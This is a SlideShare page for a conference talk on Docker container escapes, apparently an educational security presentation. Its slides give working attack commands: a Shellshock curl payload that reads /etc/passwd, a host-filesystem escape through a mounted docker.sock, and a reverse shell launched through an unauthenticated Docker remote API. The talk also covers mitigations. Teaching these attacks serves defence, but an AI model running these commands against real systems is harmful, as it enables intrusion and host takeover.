SlideShare a Scribd company logo

Demystifying Container Escapes

Vaibhav Gupta, profile picture
Vaibhav Gupta

The document discusses Docker and its attack surfaces, including the exploitation of vulnerable images, using the Docker --privilege flag, and privilege escalation through the Docker socket. It provides examples and demonstrations of running Docker containers with limited privileges and highlights potential security risks and misconfigurations. Additionally, it offers guidance on mitigating these risks and suggests resources for further information.

Software
Related topics:
Information Security
1 of 12
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
Vaibhav Gupta Twitter: @VaibhavGupta_1 Its all about Docker!
§ About Docker – 1 min Primer § Cgroups & Namespaces – Quick Demo § Docker Attack Surface 1. Exploiting Vulnerable Images 2. Docker --privilege flag 3. Privilege Esc. Using Docker.Sock 4. Abusing Docker Remote API
§ Docker is just way of running processes with limited privileges § DEMO § docker run -it ubuntu sh § ps aux | grep sleep
§ Cgroups § docker run -itd --pids-limit 5 alpine § sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 § Namespaces (E.g. User Names) § vi /tmp/root-file.txt § docker run -itd -v /tmp:/shared alpine § Edit the file within container § Mitigation § sudo dockerd --userns-remap=default
DOCKER ATTACK SURFACE
• Vulnerable Images • Container running with unintended privileges • Docker Daemon Misconfigurations • Un-Auth Docker Client Remote API • Misconfigured or Vulnerable Hosts • Insecure Registry • Backdoored Images • ??
EXPLOITING VULNERABLE IMAGES § Sample Vulnerable App § docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271 § Exploitation § curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi- bin/vulnerable
§ Some Container require /var/run/docker.sock to be mounted on containers § It is required if docker container requires to interact with host § For e.g. – ‘Dockerized’ Host Monitoring Application ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine ü docker exec -it <id> sh ü apk update ü apk add -U docker ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
§ Allows to interact with remote Docker Daemon § No authentication required - By Default § Lets gain shell! ü sudo apt install jq ü sudo vi /lib/systemd/system/docker.service ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 ü sudo systemctl daemon-reload ü sudo service docker restart ü curl http://localhost:2375/containers/json | jq ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
§ docker run -itd alpine § docker run --rm -it --cap-drop=NET_RAW alpine sh § ping 127.0.0.1 -c 2 § Printing Capabilities: capsh --print
§ https://docs.docker.com/engine/security/security/ § https://docs.docker.com/engine/security/userns-remap/ § https://securityboulevard.com/2019/02/abusing-docker-api-socket/
§ Email:Vaibhav.Gupta @ owasp.org § Twitter: @VaibhavGupta_1 § Blog: https://exploits.work

More Related Content

PPTX
Docker orchestration
Open Source Consulting
 
PDF
Launching containers with fleet
충섭 김
 
PDF
Docker 101 - from 0 to Docker in 30 minutes
Luciano Fiandesio
 
PDF
CoreOS : 설치부터 컨테이너 배포까지
충섭 김
 
PPTX
Austin - Container Days - Docker 101
Bill Maxwell
 
PDF
Provisioning & Deploying with Docker
Erica Windisch
 
PDF
Docker 初探,實驗室中的運貨鯨
Ruoshi Ling
 
PDF
Running Django on Docker: a workflow and code
Danielle Madeley
 
Docker orchestration
Open Source Consulting
 
Launching containers with fleet
충섭 김
 
Docker 101 - from 0 to Docker in 30 minutes
Luciano Fiandesio
 
CoreOS : 설치부터 컨테이너 배포까지
충섭 김
 
Austin - Container Days - Docker 101
Bill Maxwell
 
Provisioning & Deploying with Docker
Erica Windisch
 
Docker 初探,實驗室中的運貨鯨
Ruoshi Ling
 
Running Django on Docker: a workflow and code
Danielle Madeley
 

What's hot (20)

PDF
CI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos
Carlos Sanchez
 
PDF
Infrastructure Deployment with Docker & Ansible
Robert Reiz
 
PDF
dockerizing web application
Walid Ashraf
 
PDF
Introduction to docker security
Walid Ashraf
 
PDF
DCSF 19 Deploying Rootless buildkit on Kubernetes
Docker, Inc.
 
PDF
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)
Ruoshi Ling
 
PPT
Docker 101, Alexander Ryabtsev
Tetiana Saputo
 
PDF
Very Early Review - Rocket(CoreOS)
충섭 김
 
PPTX
Building a Docker v1.12 Swarm cluster on ARM
Team Hypriot
 
PPTX
Orchestration? You Don't Need Orchestration. What You Want Is Choreography by...
Docker, Inc.
 
PDF
Docker 原理與實作
kao kuo-tung
 
PDF
CoreOS Overview
Victor S. Recio
 
PDF
Docker orchestration using core os and ansible - Ansible IL 2015
Leonid Mirsky
 
PDF
How Puppet Enables the Use of Lightweight Virtualized Containers - PuppetConf...
Puppet
 
PDF
Docker puppetcamp london 2013
Tomas Doran
 
PDF
CoreOSによるDockerコンテナのクラスタリング
Yuji ODA
 
PDF
Docker in Action
Alper Kanat
 
PPTX
Docker Mentorweek beginner workshop notes
Sreenivas Makam
 
PDF
Develop QNAP NAS App by Docker
Terry Chen
 
PDF
이미지 기반의 배포 패러다임 Immutable infrastructure
Daegwon Kim
 
CI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos
Carlos Sanchez
 
Infrastructure Deployment with Docker & Ansible
Robert Reiz
 
dockerizing web application
Walid Ashraf
 
Introduction to docker security
Walid Ashraf
 
DCSF 19 Deploying Rootless buildkit on Kubernetes
Docker, Inc.
 
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)
Ruoshi Ling
 
Docker 101, Alexander Ryabtsev
Tetiana Saputo
 
Very Early Review - Rocket(CoreOS)
충섭 김
 
Building a Docker v1.12 Swarm cluster on ARM
Team Hypriot
 
Orchestration? You Don't Need Orchestration. What You Want Is Choreography by...
Docker, Inc.
 
Docker 原理與實作
kao kuo-tung
 
CoreOS Overview
Victor S. Recio
 
Docker orchestration using core os and ansible - Ansible IL 2015
Leonid Mirsky
 
How Puppet Enables the Use of Lightweight Virtualized Containers - PuppetConf...
Puppet
 
Docker puppetcamp london 2013
Tomas Doran
 
CoreOSによるDockerコンテナのクラスタリング
Yuji ODA
 
Docker in Action
Alper Kanat
 
Docker Mentorweek beginner workshop notes
Sreenivas Makam
 
Develop QNAP NAS App by Docker
Terry Chen
 
이미지 기반의 배포 패러다임 Immutable infrastructure
Daegwon Kim
 
Ad

Similar to Demystifying Container Escapes (20)

PDF
Docker security
Janos Suto
 
PDF
Introduction to Docker - Learning containerization XP conference 2016
XP Conference India
 
PDF
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
PROIDEA
 
PDF
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
Alessandro Arrichiello
 
PPTX
Docker container management
Karol Kreft
 
PPTX
Docker workshop
Evans Ye
 
PDF
Drone CI/CD 自動化測試及部署
Bo-Yi Wu
 
PPTX
Docker Security workshop slides
Docker, Inc.
 
PPTX
Running Docker in Development & Production (DevSum 2015)
Ben Hall
 
PPTX
Real World Experience of Running Docker in Development and Production
Ben Hall
 
PDF
PDXPortland - Dockerize Django
Hannes Hapke
 
PDF
手把手帶你學Docker 03042017
Paul Chao
 
PPTX
moscmy2016: Extending Docker
Mohammad Fairus Khalid
 
PDF
Docker, c'est bonheur !
Alexandre Salomé
 
PDF
Docker linuxday 2015
Massimiliano Dessì
 
PDF
時代在變 Docker 要會:台北 Docker 一日入門篇
Philip Zheng
 
PDF
手把手帶你學 Docker 入門篇
Philip Zheng
 
PDF
Docker workshop 0507 Taichung
Paul Chao
 
PDF
Things I've learned working with Docker Support
Sujay Pillai
 
PPTX
Docker Networking - Common Issues and Troubleshooting Techniques
Sreenivas Makam
 
Docker security
Janos Suto
 
Introduction to Docker - Learning containerization XP conference 2016
XP Conference India
 
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
PROIDEA
 
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
Alessandro Arrichiello
 
Docker container management
Karol Kreft
 
Docker workshop
Evans Ye
 
Drone CI/CD 自動化測試及部署
Bo-Yi Wu
 
Docker Security workshop slides
Docker, Inc.
 
Running Docker in Development & Production (DevSum 2015)
Ben Hall
 
Real World Experience of Running Docker in Development and Production
Ben Hall
 
PDXPortland - Dockerize Django
Hannes Hapke
 
手把手帶你學Docker 03042017
Paul Chao
 
moscmy2016: Extending Docker
Mohammad Fairus Khalid
 
Docker, c'est bonheur !
Alexandre Salomé
 
Docker linuxday 2015
Massimiliano Dessì
 
時代在變 Docker 要會:台北 Docker 一日入門篇
Philip Zheng
 
手把手帶你學 Docker 入門篇
Philip Zheng
 
Docker workshop 0507 Taichung
Paul Chao
 
Things I've learned working with Docker Support
Sujay Pillai
 
Docker Networking - Common Issues and Troubleshooting Techniques
Sreenivas Makam
 
Ad

Recently uploaded (20)

PDF
System and Network Administraation Chapter 3
jaramharo
 
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
OnePlan Solutions
 
PPTX
CHAPTER 2 - PM Management and IT Context
KevinPutra14
 
PDF
Upgrade and Innovation Strategies for SAP ERP Customers
Virendra Rai, PMP
 
PPTX
Introduction to Artificial Intelligence
lohedi9363
 
PDF
PTS Company Brochure 2025 (1).pdf.......
pts464036
 
PDF
How to Migrate SBCGlobal Email to Yahoo Easily
raymondjones7273
 
PDF
Navsoft: AI-Powered Business Solutions & Custom Software Development
Navsoft
 
PPTX
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
PDF
AI in Product Development-omnex systems
omnex systems
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
PPTX
VVF-Customer-Presentation2025-Ver1.9.pptx
blackmambaettijean
 
PDF
medical staffing services at VALiNTRY
Tiyan Grayson
 
PDF
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
PDF
top salesforce developer skills in 2025.pdf
CloudMetic
 
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
PDF
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
PPTX
Agentic AI Use Case- Contract Lifecycle Management (CLM).pptx
mhxyzzp
 
PDF
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
System and Network Administraation Chapter 3
jaramharo
 
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
OnePlan Solutions
 
CHAPTER 2 - PM Management and IT Context
KevinPutra14
 
Upgrade and Innovation Strategies for SAP ERP Customers
Virendra Rai, PMP
 
Introduction to Artificial Intelligence
lohedi9363
 
PTS Company Brochure 2025 (1).pdf.......
pts464036
 
How to Migrate SBCGlobal Email to Yahoo Easily
raymondjones7273
 
Navsoft: AI-Powered Business Solutions & Custom Software Development
Navsoft
 
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
AI in Product Development-omnex systems
omnex systems
 
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
VVF-Customer-Presentation2025-Ver1.9.pptx
blackmambaettijean
 
medical staffing services at VALiNTRY
Tiyan Grayson
 
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
top salesforce developer skills in 2025.pdf
CloudMetic
 
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
Agentic AI Use Case- Contract Lifecycle Management (CLM).pptx
mhxyzzp
 
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 

Demystifying Container Escapes

  • 2. § About Docker – 1 min Primer § Cgroups & Namespaces – Quick Demo § Docker Attack Surface 1. Exploiting Vulnerable Images 2. Docker --privilege flag 3. Privilege Esc. Using Docker.Sock 4. Abusing Docker Remote API
  • 3. § Docker is just way of running processes with limited privileges § DEMO § docker run -it ubuntu sh § ps aux | grep sleep
  • 4. § Cgroups § docker run -itd --pids-limit 5 alpine § sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 § Namespaces (E.g. User Names) § vi /tmp/root-file.txt § docker run -itd -v /tmp:/shared alpine § Edit the file within container § Mitigation § sudo dockerd --userns-remap=default
  • 6. • Vulnerable Images • Container running with unintended privileges • Docker Daemon Misconfigurations • Un-Auth Docker Client Remote API • Misconfigured or Vulnerable Hosts • Insecure Registry • Backdoored Images • ??
  • 7. EXPLOITING VULNERABLE IMAGES § Sample Vulnerable App § docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271 § Exploitation § curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi- bin/vulnerable
  • 8. § Some Container require /var/run/docker.sock to be mounted on containers § It is required if docker container requires to interact with host § For e.g. – ‘Dockerized’ Host Monitoring Application ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine ü docker exec -it <id> sh ü apk update ü apk add -U docker ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
  • 9. § Allows to interact with remote Docker Daemon § No authentication required - By Default § Lets gain shell! ü sudo apt install jq ü sudo vi /lib/systemd/system/docker.service ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 ü sudo systemctl daemon-reload ü sudo service docker restart ü curl http://localhost:2375/containers/json | jq ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
  • 10. § docker run -itd alpine § docker run --rm -it --cap-drop=NET_RAW alpine sh § ping 127.0.0.1 -c 2 § Printing Capabilities: capsh --print
  • 12. § Email:Vaibhav.Gupta @ owasp.org § Twitter: @VaibhavGupta_1 § Blog: https://exploits.work